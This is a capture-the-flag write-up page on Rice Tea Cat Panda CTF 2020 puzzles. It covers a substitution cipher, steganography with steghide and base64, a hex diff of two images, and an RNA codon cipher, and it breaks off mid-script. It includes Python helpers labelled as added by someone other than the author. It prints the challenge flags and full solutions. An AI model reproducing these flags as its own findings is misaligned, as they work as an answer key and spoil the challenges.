> <span class="mi">3</span>
-------------------------------
<span class="n">Welcome</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">dragon's</span> <span class="n">cave</span>
-------------------------------
<span class="n">You</span> <span class="n">see</span> <span class="n">the</span> <span class="n">dragon</span> <span class="n">sleeping</span> <span class="nb">next</span> <span class="nb">to</span> <span class="n">a</span> <span class="n">pile</span> <span class="nb">of</span> <span class="n">bodies</span>.
<span class="n">They</span> <span class="n">look</span> <span class="n">disturbingly</span> <span class="n">fresh</span>.
<span class="n">Carrying</span> <span class="n">your</span> <span class="nb">level</span> <span class="mi">6</span> <span class="n">sword</span>, <span class="n">you</span> <span class="n">walk</span> <span class="n">over</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">dragon</span>
<span class="n">You're</span> <span class="n">still</span> <span class="n">dizzy</span> <span class="nb">from</span> <span class="n">the</span> <span class="n">time</span> <span class="n">travelling</span>
<span class="n">About</span> <span class="n">half</span> <span class="n">way</span> <span class="n">towards</span> <span class="n">the</span> <span class="n">dragon</span>, <span class="n">the</span> <span class="n">blade</span> <span class="n">starts</span> <span class="n">vibrating</span>
<span class="n">As</span> <span class="k">if</span> <span class="n">by</span> <span class="n">magic</span>, <span class="n">it's</span> <span class="n">pulled</span> <span class="n">out</span> <span class="nb">of</span> <span class="n">your</span> <span class="n">hands</span>, <span class="o">and</span> <span class="n">towards</span> <span class="n">the</span> <span class="n">dragon</span>
<span class="n">As</span> <span class="n">it</span> <span class="n">reaches</span> <span class="n">approximately</span> <span class="n">Mach</span> <span class="mi">2</span> <span class="nb">right</span> <span class="o">before</span> <span class="n">impact</span>, <span class="n">you</span> <span class="nb">take</span> <span class="n">cover</span> <span class="n">behind</span> <span class="n">a</span> <span class="n">cliff</span>
<span class="n">The</span> <span class="n">impact</span> <span class="nb">can</span> <span class="n">only</span> <span class="n">be</span> <span class="n">compared</span> <span class="nb">to</span> <span class="n">a</span> <span class="n">small</span> <span class="n">bomb</span>. <span class="n">The</span> <span class="n">entire</span> <span class="n">cave</span> <span class="n">shakes</span> <span class="nb">not</span> <span class="nb">unlike</span> <span class="n">during</span> <span class="n">an</span> <span class="n">earthquake</span>.
<span class="n">As</span> <span class="n">you</span> <span class="n">look</span> <span class="n">up</span> <span class="nb">from</span> <span class="n">you</span> <span class="n">cover</span>, <span class="n">you</span> <span class="n">see</span> <span class="n">the</span> <span class="nb">level</span> <span class="mi">6</span> <span class="n">sword</span> <span class="n">floating</span> <span class="nb">in</span> <span class="n">place</span>, <span class="n">just</span> <span class="n">where</span> <span class="n">the</span> <span class="n">dragon</span> <span class="n">used</span> <span class="nb">to</span> <span class="n">be</span>.
<span class="n">You</span> <span class="n">walk</span> <span class="n">up</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">sword</span> <span class="o">and</span> <span class="n">inspect</span> <span class="n">it</span> <span class="n">closely</span>.
<span class="n">On</span> <span class="n">the</span> <span class="n">blade</span> <span class="n">you</span> <span class="nb">can</span> <span class="n">see</span> <span class="n">a</span> <span class="n">faint</span> <span class="n">inscription</span>. <span class="n">You</span> <span class="n">are</span> <span class="n">pretty</span> <span class="n">sure</span> <span class="n">this</span> <span class="n">wasn't</span> <span class="n">here</span> <span class="o">before</span>:
<span class="n">HackTM</span>{<span class="n">g3t_m0re_sl33p_and_dr1nk_m0re_water</span>}
</code></pre></div>
<p><em><a href="/rtcp2020.html">RTCP2020</a> - 2020-01-26 - nlegall</em></p>
<p><em><a href="https://riceteacatpanda.wtf">🍚🍵🐈🐼</a> - <a href="https://ctftime.org/event/910">CTFTime</a></em></p>
<p>Rice Tea Cat Panda CTF was a five-day CTF in its first edition. I really enjoyed it. Challenges, people, atmosphere, everything was amazing.</p>
<p>I want to thank all the admins (Jess Fan, Tida Ngov, Vihan Bhargava, Jess (the other one)/J) and I'm waiting for the next edition <3.</p>
<p>I finished 37th (out of 1323 people who scored at least 1 point) with 10582 points.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/rtcp/bilan.png"></p>
<h2>Rice Goddess</h2>
<h2>Cryptography</h2>
<ul>
<li><a href="/rtcp-hoooooooooomeeeeee-runnnnnnnnnnnnn.html">HOOOOOOOOOOMEEEEEE RUNNNNNNNNNNNNN!!!!!</a></li>
<li><a href="/rtcp-dont-give-the-giant-a-cookie.html">Don't Give The GIANt a COOKie</a></li>
<li><a href="/rtcp-15.html">15</a></li>
<li><a href="/rtcp-notice-me-senpai.html">notice me senpai</a></li>
<li><a href="/rtcp-wrong-way.html">Wrong Way</a></li>
<li><a href="/rtcp-thats-some-interesting-tears.html">That's Some Interesting Tea(rs)</a></li>
<li><a href="/rtcp-thats-a-lot-of-stuff.html">That's a Lot of Stuff...</a></li>
<li><a href="/rtcp-pandas-like-salads.html">Pandas Like Salads</a></li>
<li><a href="/rtcp-code-on.html">Code On</a></li>
<li><a href="/rtcp-i-love-you-3000.html">I Love You 3000</a></li>
<li><a href="/rtcp-humps-day.html">Hump's Day</a></li>
</ul>
<h2>AI</h2>
<h2>Reverse Engineering</h2>
<h2>General Skills</h2>
<ul>
<li><a href="/rtcp-pandamonium.html">pandamonium</a></li>
<li><a href="/rtcp-treeeeeeee.html">Treeeeeeee</a></li>
<li><a href="/rtcp-ghost-in-the-system.html">ghost-in-the-system</a></li>
</ul>
<h2>Web</h2>
<ul>
<li><a href="/rtcp-no-sleep.html">No Sleep</a></li>
<li><a href="/rtcp-uwu.html">Uwu?</a></li>
<li><a href="/rtcp-web-invaders.html">Web Invaders</a></li>
<li><a href="/rtcp-growls-at-the-chicken.html">Growls at the chicken</a></li>
</ul>
<h2>Binary/Executable</h2>
<ul>
<li><a href="/rtcp-tea-clicker.html">Tea Clicker</a></li>
<li><a href="/rtcp-work-in-progress.html">Work In Progress</a></li>
</ul>
<h2>Forensics</h2>
<ul>
<li><a href="/rtcp-chugalugs-footpads.html">Chugalug's Footpads</a></li>
<li><a href="/rtcp-basmati-rice-64.html">BASmati ricE 64</a></li>
</ul>
<h2>Misc</h2>
<ul>
<li><a href="/rtcp-strong-password.html">Strong Password</a></li>
</ul>
<p><em><a href="/rtcp-15.html">RTCP - 15</a> - 2020-01-25 - nlegall</em></p>
<p><em>solves : 552</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
Lhzdwt eceowwl: Dhtnwt Pcln Eaao Qwoohvw
Okw qsyo okcln bah'i fslo cl baht Dhtnwt Pcln dhtnwt cy yazwalw'y eaao ehlnhy. Dho sy co ohtly aho, okso zcnko dw fkso bah nwo. S 4vksllwt hmqasiwi s mkaoa slalbzahyqb oa okw ycow ykafvsycln kcy ewwo cl s mqsyocv dcl ae qwoohvw, fcok okw yosowzwlo: "Okcy cy okw qwoohvw bah wso so Dhtnwt Pcln." Sizcoowiqb, kw ksi ykawy al. Dho okso'y wgwl fatyw.
Okw mayo fwlo qcgw so 11:38 MZ al Xhqb 16, sli s zwtw ofwlob zclhowy qsowt, okw Dhtnwt Pcln cl rhwyocal fsy sqwtowi oa okw tanhw wzmqabww. So qwsyo, C kamw kw'y tanhw. Kaf ici co ksmmwl? Fwqq, okw DP wzmqabww ksil'o twzagwi okw WJCE isos etaz okw hmqasiwi mkaoa, fkcvk yhnnwyowi okw vhqmtco fsy yazwfkwtw cl Zsbecwqi Kwcnkoy, Akca. Okcy fsy so 11:47. Oktww zclhowy qsowt so 11:50, okw Dhtnwt Pcln dtslvk siitwyy fsy mayowi fcok fcykwy ae ksmmb hlwzmqabzwlo. Ecgw zclhowy qsowt, okw lwfy yosocal fsy valosvowi db slaokwt 4vksllwt. Sli oktww zclhowy qsowt, so 11:58, s qclp fsy mayowi: DP'y "Owqq hy sdaho hy" alqclw eathz. Okw eaao mkaoa, aokwtfcyw plafl sy wjkcdco S, fsy soosvkwi. Vqwgwqsli Yvwlw Zsnsuclw valosvowi okw DP cl rhwyocal okw lwjo isb. Fkwl rhwyocalwi, okw dtwspesyo ykceo zslsnwt ysci "Ak, C plaf fka okso cy. Kw'y nwoocln ectwi." Zbyowtb yaqgwi, db 4vksl. Laf fw vsl sqq na dsvp oa wsocln aht esyo eaai cl mwsvw.
tovm{v4T3Ehq_f1oK_3J1e_i4O4}
Challenge Author: Jess (the other one)/J
</code></pre></div>
<p>We need to undo the substitution on the flag line to get the clear text back. <a href="https://www.dcode.fr/substitution-monoalphabetique">dCode</a> offers a tool that brute-forces the monoalphabetic substitution, finds the letter correspondence and gives back the whole clear text. We need to feed it all the text and not only the flag part: the flag alone is too short to recover every letter of the mapping.</p>
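<p>The same recovery can be checked offline once a piece of the clear text is known. The Python below is an added example, not the author's dCode run: it aligns two fragments of the challenge text with their decoding, derives the cipher-to-plain letter map, rejects an inconsistent map (which would mean the cipher is not a simple substitution), reports which flag letters the known text does not cover, and applies the map to the flag line.</p>

```python
"""Known-plaintext recovery of a monoalphabetic substitution key.

Added example; the two fragments below are copied from the challenge text on
this page (ciphertext) and its decoded form (plaintext), aligned character
for character. Digits and punctuation are left untouched by the cipher.
"""

CIPHER_SAMPLE = (
    "Lhzdwt eceowwl: Dhtnwt Pcln Eaao Qwoohvw "
    "Fwqq, okw DP wzmqabww ksil'o twzagwi okw WJCE isos etaz okw hmqasiwi mkaoa"
)
PLAIN_SAMPLE = (
    "NUMBER FIFTEEN: BURGER KING FOOT LETTUCE "
    "WELL, THE BK EMPLOYEE HADN'T REMOVED THE EXIF DATA FROM THE UPLOADED PHOTO"
)
FLAG_LINE = "tovm{v4T3Ehq_f1oK_3J1e_i4O4}"


def derive_key(cipher: str, plain: str) -> dict:
    """Map each ciphertext letter (lower-cased) to its plaintext letter.

    Every ciphertext letter must map to exactly one plaintext letter and no
    two ciphertext letters may share a plaintext letter; a conflict means the
    samples are misaligned or the cipher is not a simple substitution.
    """
    if len(cipher) != len(plain):
        raise ValueError("samples must be aligned character for character")
    key = {}
    for c, p in zip(cipher.lower(), plain.upper()):
        if not c.isalpha():
            # Non-letters pass through the cipher unchanged.
            if c != p.lower():
                raise ValueError(f"non-letter mismatch: {c!r} vs {p!r}")
            continue
        seen = key.setdefault(c, p)
        if seen != p:
            raise ValueError(f"letter {c!r} maps to both {seen!r} and {p!r}")
    if len(set(key.values())) != len(key):
        raise ValueError("two ciphertext letters map to the same plaintext letter")
    return key


def missing_letters(text: str, key: dict) -> set:
    """Letters of `text` that the known plaintext did not cover."""
    return {ch for ch in text.lower() if ch.isalpha() and ch not in key}


def decode(text: str, key: dict) -> str:
    """Apply the map; output letters are upper case like the known plaintext.

    Letters the key does not cover are kept unchanged so the gaps stay visible.
    """
    return "".join(key.get(ch.lower(), ch) for ch in text)


def recover_flag() -> str:
    key = derive_key(CIPHER_SAMPLE, PLAIN_SAMPLE)
    gaps = missing_letters(FLAG_LINE, key)
    if gaps:
        raise ValueError(f"need more known plaintext to cover: {sorted(gaps)}")
    return decode(FLAG_LINE, key)


if __name__ == "__main__":
    print(recover_flag())  # RTCP{C4R3FUL_W1TH_3X1F_D4T4}
```

<p>Deriving the key from the title line alone (the first 40 characters of each sample) leaves several flag letters unmapped, which is the reason the whole text has to be used.</p>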
<p>The clear text is:</p>
<div class="highlight"><pre><span></span><code>NUMBER FIFTEEN: BURGER KING FOOT LETTUCE
THE LAST THING YOU'D WANT IN YOUR BURGER KING BURGER IS SOMEONE'S FOOT FUNGUS. BUT AS IT TURNS OUT, THAT MIGHT BE WHAT YOU GET. A 4CHANNER UPLOADED A PHOTO ANONYMOUSLY TO THE SITE SHOWCASING HIS FEET IN A PLASTIC BIN OF LETTUCE, WITH THE STATEMENT: "THIS IS THE LETTUCE YOU EAT AT BURGER KING." ADMITTEDLY, HE HAD SHOES ON. BUT THAT'S EVEN WORSE.
THE POST WENT LIVE AT 11:38 PM ON JULY 16, AND A MERE TWENTY MINUTES LATER, THE BURGER KING IN QUESTION WAS ALERTED TO THE ROGUE EMPLOYEE. AT LEAST, I HOPE HE'S ROGUE. HOW DID IT HAPPEN? WELL, THE BK EMPLOYEE HADN'T REMOVED THE EXIF DATA FROM THE UPLOADED PHOTO, WHICH SUGGESTED THE CULPRIT WAS SOMEWHERE IN MAYFIELD HEIGHTS, OHIO. THIS WAS AT 11:47. THREE MINUTES LATER AT 11:50, THE BURGER KING BRANCH ADDRESS WAS POSTED WITH WISHES OF HAPPY UNEMPLOYMENT. FIVE MINUTES LATER, THE NEWS STATION WAS CONTACTED BY ANOTHER 4CHANNER. AND THREE MINUTES LATER, AT 11:58, A LINK WAS POSTED: BK'S "TELL US ABOUT US" ONLINE FORUM. THE FOOT PHOTO, OTHERWISE KNOWN AS EXHIBIT A, WAS ATTACHED. CLEVELAND SCENE MAGAZINE CONTACTED THE BK IN QUESTION THE NEXT DAY. WHEN QUESTIONED, THE BREAKFAST SHIFT MANAGER SAID "OH, I KNOW WHO THAT IS. HE'S GETTING FIRED." MYSTERY SOLVED, BY 4CHAN. NOW WE CAN ALL GO BACK TO EATING OUR FAST FOOD IN PEACE.
RTCP{C4R3FUL_W1TH_3X1F_D4T4}
</code></pre></div>
<p><em><a href="/rtcp-basmati-rice-64.html">RTCP - BASmati ricE 64</a> - 2020-01-25 - nlegall</em></p>
<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
There's a flag in that bowl somewhere...
Replace all zs with _ in your flag and wrap in rtcp{...}.
</code></pre></div>
<p>The file we are given is a nice bowl of rice:</p>
<p><img alt="rice-bowl.jpg" src="https://blog.nlegall.fr/images/rtcp/rice-bowl.jpg"></p>
<p>Ok, let's try <code>steghide</code> to get some information about the file:</p>
<div class="highlight"><pre><span></span><code>$ steghide info rice-bowl.jpg
<span class="s2">"rice-bowl.jpg"</span>:
format: jpeg
capacity: <span class="m">3</span>,3 KB
Try to get information about embedded data ? <span class="o">(</span>y/n<span class="o">)</span> y
Enter passphrase:
</code></pre></div>
<p>A passphrase is required to show the information. Hmm, maybe the passphrase is empty:</p>
<div class="highlight"><pre><span></span><code>$ steghide info rice-bowl.jpg
<span class="s2">"rice-bowl.jpg"</span>:
format: jpeg
capacity: <span class="m">3</span>,3 KB
Try to get information about embedded data ? <span class="o">(</span>y/n<span class="o">)</span> y
Enter passphrase:
embedded file <span class="s2">"steganopayload167748.txt"</span>:
size: <span class="m">21</span>,0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf rice-bowl.jpg
Enter passphrase:
wrote extracted data to <span class="s2">"steganopayload167748.txt"</span>.
</code></pre></div>
<p>YEAH! We extracted the file successfully. Its content is quite strange:</p>
<div class="highlight"><pre><span></span><code>$ cat steganopayload167748.txt
�I��Y��<span class="p">;</span>a�x9�
��y��<span class="o">=</span>�
</code></pre></div>
<p>Maybe we don't need to decode the content but to encode it. Base64 is a good first thing to try:</p>
<div class="highlight"><pre><span></span><code>$ cat steganopayload167748.txt<span class="p">|</span> base64
s0m3t1m35zth1ng5zAr3z3nc0D3d
$ cat steganopayload167748.txt<span class="p">|</span> base64 <span class="p">|</span> sed <span class="s1">'s/z/_/g'</span>
s0m3t1m35_th1ng5_Ar3_3nc0D3d
</code></pre></div>
<p>And we get the flag: <code>rtcp{s0m3t1m35_th1ng5_Ar3_3nc0D3d}</code>.</p>
<p><em><a href="/rtcp-chugalugs-footpads.html">RTCP - Chugalug's Footpads</a> - 2020-01-25 - nlegall</em></p>
<p><em>solves : 174</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
Chugalug makes footpads that he can chug and lug. However, his left one is different from his right... I wonder why?
</code></pre></div>
<p>We have two images and need to find the flag from these two files without any other hint.</p>
<p><img alt="right.jpg" src="https://blog.nlegall.fr/images/rtcp/right.jpg"></p>
<p><img alt="left.jpg" src="https://blog.nlegall.fr/images/rtcp/left.jpg"></p>
<p>Let's begin with some checks:</p>
<div class="highlight"><pre><span></span><code>$ file right.jpg
right.jpg: JPEG image data, Exif standard: <span class="o">[</span>TIFF image data, little-endian, <span class="nv">direntries</span><span class="o">=</span><span class="m">0</span><span class="o">]</span>, baseline, precision <span class="m">8</span>, 1366x855, components <span class="m">3</span>
$ binwalk right.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
<span class="m">0</span> 0x0 JPEG image data, EXIF standard
<span class="m">12</span> 0xC TIFF image data, little-endian offset of first image directory: <span class="m">8</span>
</code></pre></div>
<p>No other data is embedded in the file. Now, check what differs between the two files:</p>
<div class="highlight"><pre><span></span><code>$ diff right.jpg left.jpg
Binary files right.jpg and left.jpg differ
</code></pre></div>
<p>Ok, <code>diff</code> sees a difference but does not show it. Converting both files to a hex dump lets us see exactly which bytes differ:</p>
<div class="highlight"><pre><span></span><code>$ xxd right.jpg > right.hex
$ xxd left.jpg > left.hex
$ diff right.hex left.hex
108c108
< 000006b0: a531 <span class="m">5505</span> 7e28 a552 4d1c e080 c5f8 7e6a .1U.~<span class="o">(</span>.RM.....~j
---
> 000006b0: a531 <span class="m">5505</span> 7e28 a572 741c e080 c5f8 7e6a .1U.~<span class="o">(</span>.rt.....~j
128c128
< 000007f0: e0e8 00f4 <span class="m">1920</span> 74fe <span class="m">4551</span> <span class="m">1771</span> e1f4 503a ..... t.EQ.q..P:
---
> 000007f0: e0e8 00f4 <span class="m">1920</span> 74fe <span class="m">6370</span> <span class="m">1771</span> e1f4 503a ..... t.cp.q..P:
146c146
< <span class="m">00000910</span>: <span class="m">9202</span> 8c10 <span class="m">3230</span> c070 <span class="m">7542</span> <span class="m">4006</span> cbe2 a029 ....20.puB@....<span class="o">)</span>
---
> <span class="m">00000910</span>: <span class="m">9202</span> 8c10 <span class="m">3230</span> c07b <span class="m">5468</span> <span class="m">4006</span> cbe2 a029 ....20.<span class="o">{</span>Th@....<span class="o">)</span>
179c179
< 00000b20: 931c 501c 79a0 336c <span class="m">9014</span> cfc9 00f8 <span class="m">3040</span> ..P.y.3l......0@
---
> 00000b20: 931c 501c <span class="m">7933</span> 7a65 <span class="m">9014</span> cfc9 00f8 <span class="m">3040</span> ..P.y3ze......0@
189c189
< 00000bc0: <span class="m">0220</span> 9a64 81bf 9b64 <span class="m">8139</span> <span class="m">1428</span> 1b06 0fc7 . .d...d.9.<span class="o">(</span>....
---
> 00000bc0: <span class="m">0220</span> 9a64 81bf 9b5f 5e39 <span class="m">7228</span> 1b06 0fc7 . .d..._^9r<span class="o">(</span>....
195c195
< 00000c20: 0cb8 2065 c071 8668 165c 1022 dfc5 02c4 .. e.q.h.\."....
---
> 00000c20: 0cb8 2065 c033 8668 165c 1022 dfc5 02c4 .. e.3.h.\."....
209c209
< 00000d00: 75a1 540c <span class="m">7234</span> 409c b57c <span class="m">9037</span> 380a 200b u.T.r4@..<span class="p">|</span>.78. .
---
> 00000d00: 75a1 545f <span class="m">7234</span> 409c b57c <span class="m">9037</span> 380a 200b u.T_r4@..<span class="p">|</span>.78. .
227c227
< 00000e20: <span class="m">7541</span> <span class="m">8170</span> 73c5 <span class="m">0314</span> 8f11 9a04 5c54 <span class="m">2031</span> uA.ps.......<span class="se">\T</span> <span class="m">1</span>
---
> 00000e20: <span class="m">7541</span> <span class="m">8170</span> 73c5 <span class="m">0314</span> 8f6e <span class="m">3004</span> 5c54 <span class="m">2031</span> uA.ps....n0.<span class="se">\T</span> <span class="m">1</span>
264c264
< <span class="m">00001070</span>: <span class="m">0004</span> <span class="m">0542</span> <span class="m">0301</span> 4a7d <span class="m">1030</span> <span class="m">4140</span> f03f <span class="m">4010</span> ...B..J<span class="o">}</span>.0A@.?@.
---
> <span class="m">00001070</span>: <span class="m">0004</span> <span class="m">0542</span> <span class="m">0301</span> 547d <span class="m">1030</span> <span class="m">4140</span> f03f <span class="m">4010</span> ...B..T<span class="o">}</span>.0A@.?@.
276c276
< <span class="m">00001130</span>: 0ba0 0b79 200e 7c38 206e 7f8a 028c c500 ...y .<span class="p">|</span><span class="m">8</span> n......
---
> <span class="m">00001130</span>: 0ba0 0b79 630e 7c38 206e 7f8a 488c c500 ...yc.<span class="p">|</span><span class="m">8</span> n..H...
299c299
< 000012a0: f18a 047e <span class="m">1920</span> 32e7 <span class="m">9203</span> d4d8 <span class="m">5103</span> 0e63 ...~. <span class="m">2</span>.....Q..c
---
> 000012a0: f18a 047e <span class="m">1920</span> 346e <span class="m">9203</span> d4d8 <span class="m">5103</span> 0e63 ...~. 4n....Q..c
<span class="m">321</span>,322c321,322
< <span class="m">00001400</span>: dcd4 a0f0 2fe2 a844 97aa 07ea c8a0 0bb8 ..../..D........
< <span class="m">00001410</span>: e250 <span class="m">1973</span> e281 b9c0 d020 010f 4c4a 04f5 .P.s..... ..LJ..
---
> <span class="m">00001400</span>: dcd4 a0f0 43e2 a844 97aa 07ea c8a0 0bb8 ....C..D........
> <span class="m">00001410</span>: e250 <span class="m">1973</span> e281 b9c0 d020 010f <span class="m">3161</span> 04f5 .P.s..... ..1a..
338c338
< <span class="m">00001510</span>: 110f 135c <span class="m">3240</span> aaf4 f240 176f aa00 3e54 ...<span class="se">\2</span>@...@.o..>T
---
> <span class="m">00001510</span>: 110f 135c <span class="m">3240</span> aa35 7d40 176f aa00 3e54 ...<span class="se">\2</span>@.5<span class="o">}</span>@.o..>T
</code></pre></div>
<p>OH! If we keep only the bytes that differ, the first two lines give us <code>rtcp</code>. Let's do it for all the lines!</p>
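<p>Collecting the differing bytes by hand is error-prone, so here is an added Python example (not the author's script) that keeps only the bytes where the two files differ, taking them from the modified file. The sample buffers are constructed from the xxd rows shown above (only the rows that differ, in file order); the script also accepts two real files on the command line.</p>

```python
"""Keep only the bytes that differ between two same-sized files.

Added example (not the author's script). RIGHT_ROWS and LEFT_ROWS are
constructed from the xxd rows in the diff above: only the rows that differ,
in file order. Leaving out the identical rows in between does not change
the result, because identical bytes are dropped anyway.
"""
import sys

RIGHT_ROWS = [
    "a531 5505 7e28 a552 4d1c e080 c5f8 7e6a",  # 000006b0
    "e0e8 00f4 1920 74fe 4551 1771 e1f4 503a",  # 000007f0
    "9202 8c10 3230 c070 7542 4006 cbe2 a029",  # 00000910
    "931c 501c 79a0 336c 9014 cfc9 00f8 3040",  # 00000b20
    "0220 9a64 81bf 9b64 8139 1428 1b06 0fc7",  # 00000bc0
    "0cb8 2065 c071 8668 165c 1022 dfc5 02c4",  # 00000c20
    "75a1 540c 7234 409c b57c 9037 380a 200b",  # 00000d00
    "7541 8170 73c5 0314 8f11 9a04 5c54 2031",  # 00000e20
    "0004 0542 0301 4a7d 1030 4140 f03f 4010",  # 00001070
    "0ba0 0b79 200e 7c38 206e 7f8a 028c c500",  # 00001130
    "f18a 047e 1920 32e7 9203 d4d8 5103 0e63",  # 000012a0
    "dcd4 a0f0 2fe2 a844 97aa 07ea c8a0 0bb8",  # 00001400
    "e250 1973 e281 b9c0 d020 010f 4c4a 04f5",  # 00001410
    "110f 135c 3240 aaf4 f240 176f aa00 3e54",  # 00001510
]
LEFT_ROWS = [
    "a531 5505 7e28 a572 741c e080 c5f8 7e6a",
    "e0e8 00f4 1920 74fe 6370 1771 e1f4 503a",
    "9202 8c10 3230 c07b 5468 4006 cbe2 a029",
    "931c 501c 7933 7a65 9014 cfc9 00f8 3040",
    "0220 9a64 81bf 9b5f 5e39 7228 1b06 0fc7",
    "0cb8 2065 c033 8668 165c 1022 dfc5 02c4",
    "75a1 545f 7234 409c b57c 9037 380a 200b",
    "7541 8170 73c5 0314 8f6e 3004 5c54 2031",
    "0004 0542 0301 547d 1030 4140 f03f 4010",
    "0ba0 0b79 630e 7c38 206e 7f8a 488c c500",
    "f18a 047e 1920 346e 9203 d4d8 5103 0e63",
    "dcd4 a0f0 43e2 a844 97aa 07ea c8a0 0bb8",
    "e250 1973 e281 b9c0 d020 010f 3161 04f5",
    "110f 135c 3240 aa35 7d40 176f aa00 3e54",
]


def rows_to_bytes(rows) -> bytes:
    """Turn xxd-style hex rows into raw bytes."""
    return bytes.fromhex("".join(rows).replace(" ", ""))


def differing_bytes(reference: bytes, modified: bytes) -> list:
    """Return (offset, modified_byte) for every position that differs.

    A length mismatch would mean bytes were inserted or removed rather than
    overwritten in place, and a positional comparison would be meaningless.
    """
    if len(reference) != len(modified):
        raise ValueError("files differ in length; not a plain overwrite")
    return [(i, b) for i, (a, b) in enumerate(zip(reference, modified)) if a != b]


def hidden_text(reference: bytes, modified: bytes) -> str:
    """Concatenate the overwritten bytes in file order, decoded as ASCII.

    Non-ASCII differences are shown as U+FFFD rather than aborting, so a
    partially textual payload is still visible.
    """
    raw = bytes(b for _, b in differing_bytes(reference, modified))
    return raw.decode("ascii", errors="replace")


def recover_flag() -> str:
    """Run the comparison on the constructed sample rows."""
    return hidden_text(rows_to_bytes(RIGHT_ROWS), rows_to_bytes(LEFT_ROWS))


if __name__ == "__main__":
    if len(sys.argv) == 3:  # python3 script.py right.jpg left.jpg
        with open(sys.argv[1], "rb") as ref, open(sys.argv[2], "rb") as mod:
            print(hidden_text(ref.read(), mod.read()))
    else:
        print(recover_flag())  # rtcp{Th3ze_^r3_n0TcH4nC1a5}
```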
<p>And finally, we get the entire flag: <code>rtcp{Th3ze_^r3_n0TcH4nC1a5}</code>.</p>
<p><em><a href="/rtcp-code-on.html">RTCP - Code On</a> - 2020-01-25 - nlegall</em></p>
<p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 500
My houseplant and I were working on a biology assignment together. Yes, my houseplant. Don't question it. Anyways, she ended up giving me a new cipher to use in my next project! So I'm giving it to my biology friends to see if they can solve it. They are, after all, studying DNA and mRNA right now.
AUGCAAGGUCUCUUGACCCAGUGGAUACUAAAUGCCUGGAAGGUAGCAUACUAG
Key: 6, 3, 4, 3, 1, 9, 8, 3, 3, 2, 7, 4, 1, 2, 4, 1
Hint : Make sure to encase the plaintext with rtcp{} Spaces are represented by a underscore, (_)
</code></pre></div>
<p>Ok. It is an RNA string using the 4 letters of the nucleotides (Adenine, Cytosine, Guanine, Uracil). We need to recover the full name of the amino acid coded by each RNA codon. We can use this picture or the table in the <a href="https://en.wikipedia.org/wiki/Genetic_code#RNA_codon_table">Wikipedia article</a>.</p>
<p>We use the key to select the right letter in each name:</p>
<p><img alt="" src="https://img.nlegall.fr/T2Mf5xDh"></p>
<table>
<thead>
<tr>
<th>Index</th>
<th>String</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Start</td>
</tr>
<tr>
<td>6</td>
<td>Gluta<code>m</code>ine</td>
</tr>
<tr>
<td>3</td>
<td>Gl<code>y</code>cine</td>
</tr>
<tr>
<td>4</td>
<td>Leu<code>c</code>ine</td>
</tr>
<tr>
<td>3</td>
<td>Le<code>u</code>cine</td>
</tr>
<tr>
<td>1</td>
<td><code>T</code>hreonine</td>
</tr>
<tr>
<td>9</td>
<td>Glutamin<code>e</code></td>
</tr>
<tr>
<td>8</td>
<td>Tryptop<code>h</code>an</td>
</tr>
<tr>
<td>3</td>
<td>Is<code>o</code>leucine</td>
</tr>
<tr>
<td>3</td>
<td>Le<code>u</code>cine</td>
</tr>
<tr>
<td>2</td>
<td>A<code>s</code>paragine</td>
</tr>
<tr>
<td>7</td>
<td>Glycin<code>e</code></td>
</tr>
<tr>
<td>4</td>
<td>Try<code>p</code>tophan</td>
</tr>
<tr>
<td>1</td>
<td><code>L</code>ysine</td>
</tr>
<tr>
<td>2</td>
<td>V<code>a</code>line</td>
</tr>
<tr>
<td>4</td>
<td>Ala<code>n</code>ine</td>
</tr>
<tr>
<td>1</td>
<td><code>T</code>yrosine</td>
</tr>
<tr>
<td></td>
<td>Stop</td>
</tr>
</tbody>
</table>
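<p>The table lookup can be automated. The Python below is an added example, not the author's script: it translates the RNA string with the standard genetic code (NCBI translation table 1, embedded as the usual 64-letter string in U, C, A, G order), checks for the start and stop codons, and picks the key-th letter (1-based) of each amino acid name. Note that the standard code gives Alanine for GCC rather than the Glycine in the table above; its 7th letter is also <code>e</code>, so the result is unchanged.</p>

```python
"""Decode the 'Code On' cipher: codon -> amino acid name -> key-th letter.

Added example; RNA and KEY are copied from the challenge text on this page.
"""

RNA = "AUGCAAGGUCUCUUGACCCAGUGGAUACUAAAUGCCUGGAAGGUAGCAUACUAG"
KEY = [6, 3, 4, 3, 1, 9, 8, 3, 3, 2, 7, 4, 1, 2, 4, 1]

# Standard genetic code (NCBI translation table 1): one-letter amino acid code
# for each codon, with bases ordered U, C, A, G for the first, second and third
# position (UUU, UUC, UUA, UUG, UCU, ...). '*' marks a stop codon.
BASES = "UCAG"
AMINO = "FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG"
NAMES = {
    "A": "Alanine", "C": "Cysteine", "D": "Aspartic acid", "E": "Glutamic acid",
    "F": "Phenylalanine", "G": "Glycine", "H": "Histidine", "I": "Isoleucine",
    "K": "Lysine", "L": "Leucine", "M": "Methionine", "N": "Asparagine",
    "P": "Proline", "Q": "Glutamine", "R": "Arginine", "S": "Serine",
    "T": "Threonine", "V": "Valine", "W": "Tryptophan", "Y": "Tyrosine",
    "*": "Stop",
}


def translate(codon: str) -> str:
    """Return the one-letter amino acid code for a three-base RNA codon."""
    if len(codon) != 3 or any(b not in BASES for b in codon):
        raise ValueError(f"bad codon {codon!r}")
    index = sum(BASES.index(b) * w for b, w in zip(codon, (16, 4, 1)))
    return AMINO[index]


def amino_acid_names(rna: str) -> list:
    """Split the RNA into codons and name the amino acid of each one."""
    if len(rna) % 3:
        raise ValueError("RNA length is not a multiple of 3")
    return [NAMES[translate(rna[i:i + 3])] for i in range(0, len(rna), 3)]


def decode(rna: str, key: list) -> str:
    """Drop the AUG start and the stop codon, then take the key[i]-th letter."""
    names = amino_acid_names(rna)
    if names[0] != "Methionine" or names[-1] != "Stop":
        raise ValueError("expected a start codon first and a stop codon last")
    names = names[1:-1]
    if len(names) != len(key):
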